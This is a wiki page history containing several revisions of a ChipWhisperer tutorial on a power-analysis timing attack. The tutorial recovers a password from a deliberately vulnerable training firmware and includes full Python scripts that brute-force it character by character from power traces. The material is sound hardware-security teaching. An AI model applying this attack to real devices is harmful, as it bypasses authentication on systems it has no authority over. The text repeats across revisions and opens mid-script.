self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)])
self.api.capture1()

# Grab the trace
nextTrace = self.api.getScope().channels[0].getTrace()

# Check location 153, 225, etc. If it's too low, we've failed
if nextTrace[153 + 72*i] < -0.2:
continue

# If we got here, we've found the right letter
password += c
print '{} characters: {}'.format(i+1, password)
break
</pre>

{{Template:Tutorials}}
[[Category:Tutorials]]

Tutorial B3-1 Timing Analysis with Power for Password Bypass

2017-07-21T23:20:18Z

DavidRysk: minor grammar

This tutorial will introduce you to breaking devices by determining when a device is performing certain operations. It will use a simple password check, and demonstrate how to perform a basic power analysis.

In addition this example shows you how to drive the ChipWhisperer software with a script, rather than using the GUI. This will be required when attacking new devices which you have not yet added to the core ChipWhisperer software.

Note this is not a prerequisite to the tutorial on breaking AES. You can skip this tutorial if you wish to go ahead with the AES tutorial.

You can also view a 53-min [https://www.youtube.com/watch?v=h4eAU6vEONs&hd=1 Video Version on YouTube]:

= Prerequisites =

You should have already completed [[Tutorial B2 Viewing Instruction Power Differences]] to gain a better understanding of the ChipWhisperer interface.

= Building the Target Firmware =

The target firmware is located in the directory <code>chipwhisperer\hardware\victims\firmware\basic-passwdcheck</code>. Build the firmware using <code>make</code>, once again being careful to ensure you are using the correct <code>PLATFORM=</code> command. You should end up with something like this being printed:

<pre>Creating Symbol Table: basic-passwdcheck.sym
avr-nm -n basic-passwdcheck.elf > basic-passwdcheck.sym

Size after:
AVR Memory Usage
----------------
Device: atxmega128d3

Program: 5400 bytes (3.9% Full)
(.text + .data + .bootloader)

Data: 524 bytes (6.4% Full)
(.data + .bss + .noinit)

Built for platform CW-Lite XMEGA

-------- end --------</pre>

= Manual Communications with the Target =

At this point, you should be able to configure the target as in the previous tutorials. Rather than tediously going through the setup process again, we'll simply use one of the scripts built into the ChipWhisperer-Capture software. This will demonstrate how we can use a script as a starting point to simplify our setup.

<ol style="list-style-type: decimal;">
<li>Connect your target hardware (ChipWhisperer-Lite/Pro or ChipWhisperer-Capture Rev 2 with target board).</li>
<li>Open the ChipWhisperer-Capture software.</li>
<li>From the ''Example Scripts'', select one which most closely matches your hardware. For example here I'm using a ChipWhisperer-Lite with the XMEGA target, so will select the "ChipWhisperer-Lite: AES SimpleSerial on XMEGA" script. Note I'm ''NOT'' attacking AES, so will need to make some adjustments later. (The "Timing Attack on CW-Lite (XMEGA)" script already does most of this for us, so using it would defeat the purpose of this tutorial.)</li>
<li>The system should connect to your hardware. Remember you have not yet reprogrammed the target so won't be communicating with the target program.</li>
<li>Using the programming tool (such as XMEGA programming dialog), program the file <code>basic-passwdcheck.hex</code> into the target device. This file is located where you ran <code>make</code> previously.</li>
<li>Select ''Tools --> Terminal'', and press ''Connect''. You should see a window such as this:
<blockquote>[[File:Termconn.png|image]]</blockquote></li>
<li>At this point we need to reset the target device. The easiest way to do this is use the programmer interface, and press the ''Check Signature'' or ''Read Signature'' button. This will reset the target device as part of the signature read operation. You should see some messages come across the terminal emulator window:
<blockquote>[[File:Checksig_print.png|image]]</blockquote>
<dl>
<dt>Note a few warnings about the terminal emulator:</dt>
<dd><ul>
<li>The on-board buffer is fairly small, and can be easily overflowed. You may notice a few longer lines become trunicated if printing is too fast!</li>
<li>You can uncheck the "Show non-ASCII as hex" to avoid having the <code>0a</code> printed in red. The <code>0a</code> is the hex character for a newline. Many protocols use non-ASCII characters, so to help with debugging it is left enabled by default.</li></ul>
</dd></dl>
</li>
<li>We've now got some super-secure system! Let's begin with some exploratory tests - in this case I happened to know the correct password is <code>h0px3</code>.
<blockquote>'''tip'''
In real systems, you may often know ''one'' of the passwords, which is sufficient to investigate the password checking routines as we will do. You also normally have an ability to reset passwords to default. While the reset procedure would erase any data you care about, the attacker will be able to use this 'sacrificial' device to learn about possible vulnerabilites. So the assumption that we have access to the password is really just saying we have access to ''a'' password, and will use that knowledge to break the system in general.</blockquote></li>
<li>Using the terminal emulator, write the correct password in, and press <code><enter></code>. You should be greeted by a welcome message, and if using the CW-Lite XMEGA target the green LED will illuminate:
[[File:Passok.png|image]]</li>
<li>The system enters an infinite loop for any password entry. Thus you must reset the system, use the ''Programmer Window'' to again perform a ''Check Signature'' or ''Read Signature'' operation.</li>
<li>Enter an incorrect password - notice a different message is printed, and if using the CW-Lite XMEGA target the red LED will come on.</li></ol>

= Recording Power Traces =
Now that we can communicate with our super-secure system, our next goal is to get a power trace while the target is running. To do this, we'll get the power measurements to trigger after we send our password to the target.

<ol style="list-style-type: decimal;">
<li>We'll make some changes to the trigger setup of the ChipWhisperer (on the ''Scope Settings'' tab). In particular, ensure you set the following:
<blockquote><ul>
<li>Offset = 0</li>
<li>Timeout set to 5 seconds or greater (to give yourself time when manually testing)</li></ul>

[[File:Timeout_offset.png|image]]</blockquote></li>
<li>Change to the ''Target Settings'' tab, and delete the ''Command'' strings. Those strings are used in the AES attack to send a specific command to the target device. For now we will be manually sending data:
<blockquote>[[File:Text_targetsettings.png|image]]</blockquote></li>
<li>Still in the ''Target Settings'' tab, under ''Protocol Version'', change ''Version'' from ''Auto'' to ''1.0''
<li>Perform the following actions:
<blockquote><ol style="list-style-type: lower-roman;">
<li>Reset the target device (e.g. by performing the signature check).</li>
<li>Enter the password <code>h0px3</code> in the terminal window, but ''do not'' yet hit enter.</li>
<li>Press the ''Capture 1'' button, and immediately switch to the terminal emulator window and press <code><enter></code> to send the password.</li></ol>
</blockquote>
You must send the password before the timeout occurs -- you can increase the length of the timeout if needed to give yourself more time! If this works you should see the power consumption displayed in the GUI:
<blockquote>[[File:Trace_manual_pass.png|image]]</blockquote></li>

<li>Rather than using the manual terminal, let's now use the GUI to automatically send a password try. Switching back to the ''Target Settings'' tab, write <code>h0px3\n</code> into the ''Go Command'' option:
<blockquote>[[File:Gocorrect.png|image]]</blockquote>
The ''Go Command'' is sent right after the scope is armed. In this example it means we can capture the power consumption during the password entry phase.</li>
<li>Now perform the following actions:
<blockquote><ol style="list-style-type: lower-roman;">
<li>Reset the target device (e.g. by performing the signature check).</li>
<li>Press the ''Capture 1'' button.</li></ol>
</blockquote>
Hopefully this resulted in the same waveform as before! Note the device takes around 1 second to 'boot', so if you are too lightning fast after resetting the device it won't actually be ready to accept the password. You can keep the terminal emulator window open to view the output data.</li>
<li>Play around with the password entered on the ''Go Command'' - try all of the following:
<ul>
<li><code>h0px3\n</code></li>
<li><code>h0px4\n</code></li>
<li><code>h0paa\n</code></li>
<li><code>haaaa\n</code></li>
<li><code>a\n</code></li></ul>

You should notice a distinct change in the password depending how many characters were correct. For example the following shows the difference between passwords of <code>h0px4</code> (which has 4 correct characters) and <code>h0paa</code> (which has 3 correct characters):
<blockquote>[[File:3vs4.png|image]]</blockquote></li></ol>

= Automatic Resets =
The last step before scripting an entire attack is to figure out how to automatically reset the target device before (or after) each capture. There are two ways to do this, and the following steps take you through two examples of how to accomplish this goal.

== Reset via Spare IO Lines ==

TODO - see reset via programming interface for now

== Reset via Auxiliary Module ==

Auxiliary modules are small pieces of code that can perform some extra functions during the capture process. The functions inside these Python modules are run before a capture, before the power measurement is armed, before the measurement is triggered, after a single trace is completed, and after an entire capture is finished. We will use an existing auxiliary module to reset the target chip before arming the measurement so that we don't have to manually reset the device.

<ol style="list-style-type: decimal;">
<li> We're going to use the ''Reset AVR/XMEGA via CW-Lite'' auxiliary module. Let's get an idea of how this module works:
* Navigate to the auxiliary modules folder (<code>chipwhisperer\software\chipwhisperer\capture\auxiliary\</code>) and open <code>ResetCW1183Read.py</code> in your choice of text editor.
* Find the function definition for <code>resetDevice()</code>. It contains a line that looks like:
<pre>
CWCoreAPI.getInstance().getScope().scopetype.cwliteXMEGA.readSignature()
</pre>
* Look for the lines where this function gets called. You'll find that the function <code>traceArm()</code> uses it like:
<pre>
resettiming = self.findParam('resettiming').value()
if resettiming == 'Pre-Arm':
self.resetDevice()
</pre>
Effectively, this code will read the target's signature before we arm the power measurement. This means that the target will automatically be reset before capturing a power trace.
</li>

<li> Go back to the ChipWhisperer Capture software. In the ''Generic Settings'' tab, switch the Auxiliary Module to ''Reset AVR/XMEGA via CW-Lite''.
</li>
<li> Now, in the ''Aux Settings'' tab, we can configure our automatic reset. Make sure the settings are:
* Pre-arm delay: roughly 1200 ms
* Post-arm delay: the default (0 ms) is fine
* Reset timing: Pre-arm (reset the device before we arm the scope)
</li>
<li> Press ''Capture 1''. The target will automatically reset, with the Safe-o-matic 3000 boot sequence appearing in the console. Then, 1 second later, the program will send the password to the target and record a power trace.
</li>
</ol>

Now, confirm that you can try different passwords (in ''Target Settings'') and see how the power trace changes when your password has 0, 1, 2... correct characters.

= Performing the Timing Attack =
So far, we've set up our ChipWhisperer to automatically reset the target, send it a password attempt of our choice, and record a power trace while the target processes the password. Now, we'll write a Python script to automatically try different passwords and use these power traces to discover the password stored on the target.

== Scripting the Setup ==
Our first step will be to write a script that automatically sets up the ChipWhisperer Capture software with all of the settings we've tested above. We'll do this by modifying an existing script with our own settings.

<ol style="list-style-type: decimal;">
<li>Make a copy of an existing ChipWhisperer script. The example scripts are located at <code>chipwhisperer\software\chipwhisperer\capture\scripts</code>; for example, the default one for the XMEGA device is called <code>cwlite-simpleserialxmega.py</code>. Make a copy of this script and put it somewhere memorable.
</li>
<li>Rename the script something else - for example, <code>cwlite-passwordcrack.py</code> - and open it for editing. You'll notice that a large chunk of the code is used to set the parameters:
<pre>#Example of using a list to set parameters. Slightly easier to copy/paste in this format
lstexample = [['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
['CW Extra', 'CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'],
['CW Extra', 'CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'],
['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0],
['CW Extra', 'CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'],
['OpenADC', 'Trigger Setup', 'Total Samples', 3000],
['OpenADC', 'Trigger Setup', 'Offset', 1500],
['OpenADC', 'Gain Setting', 'Setting', 45],
['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'],
#Final step: make DCMs relock in case they are lost
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],
]</pre>
Those parameters come from the ''Scripting Parameters'' tab. Switch over to it and notice this tab logs all of the parameter changes, showing you how to change the parameters through the API:
<blockquote>[[File:Scriptcommands.png|image]]</blockquote>
Note that commands run via the script are also printed, so you can see where the values being set are coming from too. 
</li>

<li>At this point, close the ''ChipWhisperer-Capture'' window so we can confirm the script still works. Run the new script (which doesn't have any changes yet) from the command line. You may have to open a console with Python in the path:
<blockquote><ol style="list-style-type: lower-roman;">
<li>If you installed WinPython, run the ''WinPython Console'' from your WinPython installation directory.</li>
<li>If using the VMWare image of a Linux machine, this should just be a regular console</li></ol>
</blockquote></li></ol>
<blockquote>Run the script with <code>python cwlite-passwordcrack.py</code>. If the script errors out, it might be that the location of the FPGA bitstream is stored in relative terms. To fix this perform the following:
<blockquote><ol style="list-style-type: lower-roman;">
<li>Open ChipWhisperer-Capture regularly.</li>
<li>Run the ChipWhisperer script that you used previously.</li>
<li>Select ''Tools-->Config CW Firmware''</li>
<li>Under the "FPGA .zip (Release)", hit the "Find" button. Point the system to the file <code>chipwhisperer/hardware/capture/chipwhisperer-lite/cwlite_firmware.zip</code> on your filesystem. Note by default there is a relative path.</li></ol>
</blockquote></blockquote>

<ol start="4" style="list-style-type: decimal;">
<li>Once again on the ''Target Settings'' tab, delete the various commands. Make a note of the resulting ''Script Commands'' which you will need to enter to achieve this same goal. Close ChipWhisperer-Capture.</li>
<li>Continue editing your script. First, find the line setting the Trigger Offset:
<pre>['OpenADC', 'Trigger Setup', 'Offset', 1500],</pre>
And set this to 0, which we were using previously:
<pre>['OpenADC', 'Trigger Setup', 'Offset', 0],</pre></li>
<li>Next, append the required commands to clear the simpleserial commands and to enable the automatic resets:
<pre>#Example of using a list to set parameters. Slightly easier to copy/paste in this format
lstexample = [['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
...BUNCH MORE COMMANDS HERE HAVE BEEN REMOVED...
#Final step: make DCMs relock in case they are lost
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],

#Append your commands here
['Simple Serial', 'Load Key Command', u''],
['Simple Serial', 'Go Command', u''],
['Simple Serial', 'Output Format', u''],

['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'],
['Aux Settings', 'Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200],
]</pre></li>

<li>Finally, we will set the password. You can enter the password in the Capture ''Target Settings'' tab, and see the following sort of call would set the appropriate password:
<pre>self.api.setParameter(['Simple Serial', 'Go Command', u'h0px3\\n'])</pre>
Note the newline is actually escaped, to set the text equivalent of what will be printed. This will result in an actual newline going out across the serial port. Set that command at some point in your script.
<li>Close any open ChipWhisperer-Capture windows, and run the script as before. You should connect to the target, and be able to press ''Capture 1'' and see the correct waveform.</li>
</ol>

== Running a Single Capture ==
With our settings prepared, the next step is to use our script to record and analyze a power trace. We need to be able to get the trace data into our Python script so we can analyze it for the timing attack.

The API allows us to ''press the Capture 1'' button and ''view the power trace'' without using the GUI. There are two relevant commands here:
* <code> self.api.capture1()</code> acts as if we've just pressed the ''Capture 1'' button;
* <code> self.api.getScope().channels[0].getTrace()</code> returns a list of datapoints that were recorded in the previous capture.
We want to test these two commands. After the setup portion of your script, add some code similar to the following:
<pre>
self.api.capture1()
data = self.api.getScope().channels[0].getTrace()
print data
</pre>
Run your script. The ChipWhisperer should automatically capture one trace and print out the several thousand datapoints. This is all we need to continue.

== Attacking a Single Letter ==
Now that we can record one power trace, we can start the timing attack. Our goal here is to automatically find the first letter of the Super Secret (tm) password.

<li>Look at this example of the power traces when 0 and 1 bytes are correct. We can see a clear point that appears to shift forward in time:
<blockquote>[[File:Passwordcrackerpts.png|image]]</blockquote>
When we guess the first byte incorrectly, there is a distinct power spike at sample number 153. However, when we guess correctly, the target spends more time processing the password, and this spike moves 72 samples forward. This means that we can check if our first byte is correct by checking this data point: if we're right, it will have an amplitude greater than -0.2. Note the specific point will change for different hardware, and may also change if you use different versions of avr-gcc to compile the target code. The example code here was compiled with WinAVR 20100110, which has avr-gcc 4.3.3. If you view the video version of this tutorial the point numbers are different for example, so be sure to check what they are for your specific system.</li>

<li> Add a loop to your script that does the following:
* Sets the ''Go Command'' to the next character we want to try
* Captures a power trace
* Checks if sample 153 is above -0.2 (fill in the appropriate numbers here)
* Repeats for all characters we want to try
An example of this loop is:
<pre>
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for c in trylist:
# Test this password and record a power trace
self.api.setParameter(['Simple Serial', 'Go Command', c + '\n'])
self.api.capture1()

# Get the data and check data[153]
data = self.api.getScope().channels[0].getTrace()
if data[153] > -0.2:
print "Success: " + c
</pre>
This script will eventually stop, but you can use Ctrl+C on the command line to kill it. Make sure your script prints "Success: h"!
</li>

== Attacking the Full Password ==
The last step is to attack the entire password, one letter at a time. The procedure to do this is:
* Start with a blank password string
* Loop through all of the characters we want to try:
** Add the next character to the end of the password
** Test this new candidate password using code similar to the above
** If the new password is correct up to character (1, 2, ..., 5), add it to the end of the password
* Repeat until we've cracked all 5 characters.

Note that the point of interest is no longer at sample 153. We noticed earlier that this key point moves 72 samples forward for every correct character, so we'll have to check location <code>153</code> for character 0, <code>153 + 72</code> for character 1, and <code>153 + i*72</code> for character <code>i</code>.

An example of this loop is:
<pre>
password = ''
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for i in range(5):
for c in trylist:
# Get a power trace using our next attempt
nextPass = password + '{}'.format(c)
self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)])
self.api.capture1()

# Grab the trace
nextTrace = self.api.getScope().channels[0].getTrace()

# Check location 153, 225, etc. If it's too low, we've failed
if nextTrace[153 + 72*i] < -0.2:
continue

# If we got here, we've found the right letter
password += c
print '{} characters: {}'.format(i+1, password)
break
</pre>
After some time, this prints <code>5 characters: h0px3</code> -- it automatically finds the correct password.

That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:

* The target device has a finite start-up time, which slows down the attack. If you wish, remove some of the printf()'s from the target code, recompile and reprogram, and see how quickly you can do this attack.
* The current script doesn't look for the "WELCOME" message when the password is OK. That is an extension that allows it to crack any size password.
* If there was a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.

= Conclusion =

This tutorial has demonstrated the use of the power side-channel for performing timing attacks. A target with a simple password-based security system is broken. In addition you have learned about the scripting support in the ChipWhisperer-Capture software.

= Appendix: Completed Timing Attack Script =
The <code>run()</code> function at the end of the tutorial might look something like the following:
<pre>
def run(self):
# This is the function that gets called when our script starts

# First: set up the basics and connect to the CW-Lite
self.api.setParameter(['Generic Settings', 'Scope Module', 'ChipWhisperer/OpenADC'])
self.api.setParameter(['Generic Settings', 'Target Module', 'Simple Serial'])
self.api.setParameter(['Generic Settings', 'Trace Format', 'ChipWhisperer/Native'])
self.api.setParameter(['Simple Serial', 'Connection', 'ChipWhisperer-Lite'])
self.api.setParameter(['ChipWhisperer/OpenADC', 'Connection', 'ChipWhisperer-Lite'])
self.api.connect()

# Next: set up everything we need to connect to the target
# Put all of our commands in a list and execute them at the end
lstexample = [
# Gain
['OpenADC', 'Gain Setting', 'Setting', 45],
# Trigger
['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'],
['OpenADC', 'Trigger Setup', 'Offset', 0],
['OpenADC', 'Trigger Setup', 'Total Samples', 2000],
# Clock
['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],
# Pins
['CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
['CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'],
['CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'],
['CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'],
# Automatic commands
['Simple Serial', 'Load Key Command', ''],
['Simple Serial', 'Go Command', 'h0px3\n'],
['Simple Serial', 'Output Format', ''],
# Auto-reset
['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'],
['Aux Settings', 'Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200],
]

#Download all hardware setup parameters
for cmd in lstexample:
self.api.setParameter(cmd)

# Get one capture for fun
self.api.capture1()
data = self.api.getScope().channels[0].getTrace()
print data

# Crack the first letter
password = ''
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for i in range(5):
for c in trylist:
# Get a power trace using our next attempt
nextPass = password + '{}'.format(c)
self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)])
self.api.capture1()

# Grab the trace
nextTrace = self.api.getScope().channels[0].getTrace()

# Check location 153, 225, etc. If it's too low, we've failed
if nextTrace[153 + 72*i] < -0.2:
continue

# If we got here, we've found the right letter
password += c
print '{} characters: {}'.format(i+1, password)
break
</pre>

{{Template:Tutorials}}
[[Category:Tutorials]]

Tutorial B3-1 Timing Analysis with Power for Password Bypass

2017-07-21T23:19:20Z

DavidRysk: Italics for consistency

This tutorial will introduce you to breaking devices by determining when a device is performing certain operations. It will use a simple password check, and demonstrate how to perform a basic power analysis.

In addition this example shows you how to drive the ChipWhisperer software with a script, rather than using the GUI. This will be required when attacking new devices which you have not yet added to the core ChipWhisperer software.

Note this is not a prerequisite to the tutorial on breaking AES. You can skip this tutorial if you wish to go ahead with the AES tutorial.

You can also view a 53-min [https://www.youtube.com/watch?v=h4eAU6vEONs&hd=1 Video Version on YouTube]:

= Prerequisites =

You should have already completed [[Tutorial B2 Viewing Instruction Power Differences]] to gain a better understanding of the ChipWhisperer interface.

= Building the Target Firmware =

The target firmware is located in the directory <code>chipwhisperer\hardware\victims\firmware\basic-passwdcheck</code>. Build the firmware using <code>make</code>, once again being careful to ensure you are using the correct <code>PLATFORM=</code> command. You should end up with something like this being printed:

<pre>Creating Symbol Table: basic-passwdcheck.sym
avr-nm -n basic-passwdcheck.elf > basic-passwdcheck.sym

Size after:
AVR Memory Usage
----------------
Device: atxmega128d3

Program: 5400 bytes (3.9% Full)
(.text + .data + .bootloader)

Data: 524 bytes (6.4% Full)
(.data + .bss + .noinit)

Built for platform CW-Lite XMEGA

-------- end --------</pre>

= Manual Communications with the Target =

At this point, you should be able to configure the target as in the previous tutorials. Rather than tediously going through the setup process again, we'll simply use one of the scripts built into the ChipWhisperer-Capture software. This will demonstrate how we can use a script as a starting point to simplify our setup.

<ol style="list-style-type: decimal;">
<li>Connect your target hardware (ChipWhisperer-Lite/Pro or ChipWhisperer-Capture Rev 2 with target board).</li>
<li>Open the ChipWhisperer-Capture software.</li>
<li>From the ''Example Scripts'', select one which most closely matches your hardware. For example here I'm using a ChipWhisperer-Lite with the XMEGA target, so will select the "ChipWhisperer-Lite: AES SimpleSerial on XMEGA" script. Note I'm ''NOT'' attacking AES, so will need to make some adjustments later. (The "Timing Attack on CW-Lite (XMEGA)" script already does most of this for us, so using it would defeat the purpose of this tutorial.)</li>
<li>The system should connect to your hardware. Remember you have not yet reprogrammed the target so won't be communicating with the target program.</li>
<li>Using the programming tool (such as XMEGA programming dialog), program the file <code>basic-passwdcheck.hex</code> into the target device. This file is located where you ran <code>make</code> previously.</li>
<li>Select ''Tools --> Terminal'', and press ''Connect''. You should see a window such as this:
<blockquote>[[File:Termconn.png|image]]</blockquote></li>
<li>At this point we need to reset the target device. The easiest way to do this is use the programmer interface, and press the ''Check Signature'' or ''Read Signature'' button. This will reset the target device as part of the signature read operation. You should see some messages come across the terminal emulator window:
<blockquote>[[File:Checksig_print.png|image]]</blockquote>
<dl>
<dt>Note a few warnings about the terminal emulator:</dt>
<dd><ul>
<li>The on-board buffer is fairly small, and can be easily overflowed. You may notice a few longer lines become trunicated if printing is too fast!</li>
<li>You can uncheck the "Show non-ASCII as hex" to avoid having the <code>0a</code> printed in red. The <code>0a</code> is the hex character for a newline. Many protocols use non-ASCII characters, so to help with debugging it is left enabled by default.</li></ul>
</dd></dl>
</li>
<li>We've now got some super-secure system! Let's begin with some exploratory tests - in this case I happened to know the correct password is <code>h0px3</code>.
<blockquote>'''tip'''
In real systems, you may often know ''one'' of the passwords, which is sufficient to investigate the password checking routines as we will do. You also normally have an ability to reset passwords to default. While the reset procedure would erase any data you care about, the attacker will be able to use this 'sacrificial' device to learn about possible vulnerabilites. So the assumption that we have access to the password is really just saying we have access to ''a'' password, and will use that knowledge to break the system in general.</blockquote></li>
<li>Using the terminal emulator, write the correct password in, and press <code><enter></code>. You should be greeted by a welcome message, and if using the CW-Lite XMEGA target the green LED will illuminate:
[[File:Passok.png|image]]</li>
<li>The system enters an infinite loop for any password entry. Thus you must reset the system, use the ''Programmer Window'' to again perform a ''Check Signature'' or ''Read Signature'' operation.</li>
<li>Enter an incorrect password - notice a different message is printed, and if using the CW-Lite XMEGA target the red LED will come on.</li></ol>

= Recording Power Traces =
Now that we can communicate with our super-secure system, our next goal is to get a power trace while the target is running. To do this, we'll get the power measurements to trigger after we send our password to the target.

<ol style="list-style-type: decimal;">
<li>We'll make some changes to the trigger setup of the ChipWhisperer (on the ''Scope Settings'' tab). In particular, ensure you set the following:
<blockquote><ul>
<li>Offset = 0</li>
<li>Timeout set to 5 seconds or greater (to give yourself time when manually testing)</li></ul>

[[File:Timeout_offset.png|image]]</blockquote></li>
<li>Change to the ''Target Settings'' tab, and delete the ''Command'' strings. Those strings are used in the AES attack to send a specific command to the target device, for now we will be manually sending data:
<blockquote>[[File:Text_targetsettings.png|image]]</blockquote></li>
<li>Still in the ''Target Settings'' tab, under ''Protocol Version'', change ''Version'' from ''Auto'' to ''1.0''
<li>Perform the following actions:
<blockquote><ol style="list-style-type: lower-roman;">
<li>Reset the target device (e.g. by performing the signature check).</li>
<li>Enter the password <code>h0px3</code> in the terminal window, but ''do not'' yet hit enter.</li>
<li>Press the ''Capture 1'' button, and immediately switch to the terminal emulator window and press <code><enter></code> to send the password.</li></ol>
</blockquote>
You must send the password before the timeout occurs -- you can increase the length of the timeout if needed to give yourself more time! If this works you should see the power consumption displayed in the GUI:
<blockquote>[[File:Trace_manual_pass.png|image]]</blockquote></li>

<li>Rather than using the manual terminal, let's now use the GUI to automatically send a password try. Switching back to the ''Target Settings'' tab, write <code>h0px3\n</code> into the ''Go Command'' option:
<blockquote>[[File:Gocorrect.png|image]]</blockquote>
The ''Go Command'' is sent right after the scope is armed. In this example it means we can capture the power consumption during the password entry phase.</li>
<li>Now perform the following actions:
<blockquote><ol style="list-style-type: lower-roman;">
<li>Reset the target device (e.g. by performing the signature check).</li>
<li>Press the ''Capture 1'' button.</li></ol>
</blockquote>
Hopefully this resulted in the same waveform as before! Note the device takes around 1 second to 'boot', so if you are too lightning fast after resetting the device it won't actually be ready to accept the password. You can keep the terminal emulator window open to view the output data.</li>
<li>Play around with the password entered on the ''Go Command'' - try all of the following:
<ul>
<li><code>h0px3\n</code></li>
<li><code>h0px4\n</code></li>
<li><code>h0paa\n</code></li>
<li><code>haaaa\n</code></li>
<li><code>a\n</code></li></ul>

You should notice a distinct change in the password depending how many characters were correct. For example the following shows the difference between passwords of <code>h0px4</code> (which has 4 correct characters) and <code>h0paa</code> (which has 3 correct characters):
<blockquote>[[File:3vs4.png|image]]</blockquote></li></ol>

= Automatic Resets =
The last step before scripting an entire attack is to figure out how to automatically reset the target device before (or after) each capture. There are two ways to do this, and the following steps take you through two examples of how to accomplish this goal.

== Reset via Spare IO Lines ==

TODO - see reset via programming interface for now

== Reset via Auxiliary Module ==

Auxiliary modules are small pieces of code that can perform some extra functions during the capture process. The functions inside these Python modules are run before a capture, before the power measurement is armed, before the measurement is triggered, after a single trace is completed, and after an entire capture is finished. We will use an existing auxiliary module to reset the target chip before arming the measurement so that we don't have to manually reset the device.

<ol style="list-style-type: decimal;">
<li> We're going to use the ''Reset AVR/XMEGA via CW-Lite'' auxiliary module. Let's get an idea of how this module works:
* Navigate to the auxiliary modules folder (<code>chipwhisperer\software\chipwhisperer\capture\auxiliary\</code>) and open <code>ResetCW1183Read.py</code> in your choice of text editor.
* Find the function definition for <code>resetDevice()</code>. It contains a line that looks like:
<pre>
CWCoreAPI.getInstance().getScope().scopetype.cwliteXMEGA.readSignature()
</pre>
* Look for the lines where this function gets called. You'll find that the function <code>traceArm()</code> uses it like:
<pre>
resettiming = self.findParam('resettiming').value()
if resettiming == 'Pre-Arm':
self.resetDevice()
</pre>
Effectively, this code will read the target's signature before we arm the power measurement. This means that the target will automatically be reset before capturing a power trace.
</li>

<li> Go back to the ChipWhisperer Capture software. In the ''Generic Settings'' tab, switch the Auxiliary Module to ''Reset AVR/XMEGA via CW-Lite''.
</li>
<li> Now, in the ''Aux Settings'' tab, we can configure our automatic reset. Make sure the settings are:
* Pre-arm delay: roughly 1200 ms
* Post-arm delay: the default (0 ms) is fine
* Reset timing: Pre-arm (reset the device before we arm the scope)
</li>
<li> Press ''Capture 1''. The target will automatically reset, with the Safe-o-matic 3000 boot sequence appearing in the console. Then, 1 second later, the program will send the password to the target and record a power trace.
</li>
</ol>

Now, confirm that you can try different passwords (in ''Target Settings'') and see how the power trace changes when your password has 0, 1, 2... correct characters.

= Performing the Timing Attack =
So far, we've set up our ChipWhisperer to automatically reset the target, send it a password attempt of our choice, and record a power trace while the target processes the password. Now, we'll write a Python script to automatically try different passwords and use these power traces to discover the password stored on the target.

== Scripting the Setup ==
Our first step will be to write a script that automatically sets up the ChipWhisperer Capture software with all of the settings we've tested above. We'll do this by modifying an existing script with our own settings.

<ol style="list-style-type: decimal;">
<li>Make a copy of an existing ChipWhisperer script. The example scripts are located at <code>chipwhisperer\software\chipwhisperer\capture\scripts</code>; for example, the default one for the XMEGA device is called <code>cwlite-simpleserialxmega.py</code>. Make a copy of this script and put it somewhere memorable.
</li>
<li>Rename the script something else - for example, <code>cwlite-passwordcrack.py</code> - and open it for editing. You'll notice that a large chunk of the code is used to set the parameters:
<pre>#Example of using a list to set parameters. Slightly easier to copy/paste in this format
lstexample = [['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
['CW Extra', 'CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'],
['CW Extra', 'CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'],
['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0],
['CW Extra', 'CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'],
['OpenADC', 'Trigger Setup', 'Total Samples', 3000],
['OpenADC', 'Trigger Setup', 'Offset', 1500],
['OpenADC', 'Gain Setting', 'Setting', 45],
['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'],
#Final step: make DCMs relock in case they are lost
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],
]</pre>
Those parameters come from the ''Scripting Parameters'' tab. Switch over to it and notice this tab logs all of the parameter changes, showing you how to change the parameters through the API:
<blockquote>[[File:Scriptcommands.png|image]]</blockquote>
Note that commands run via the script are also printed, so you can see where the values being set are coming from too. 
</li>

<li>At this point, close the ''ChipWhisperer-Capture'' window so we can confirm the script still works. Run the new script (which doesn't have any changes yet) from the command line. You may have to open a console with Python in the path:
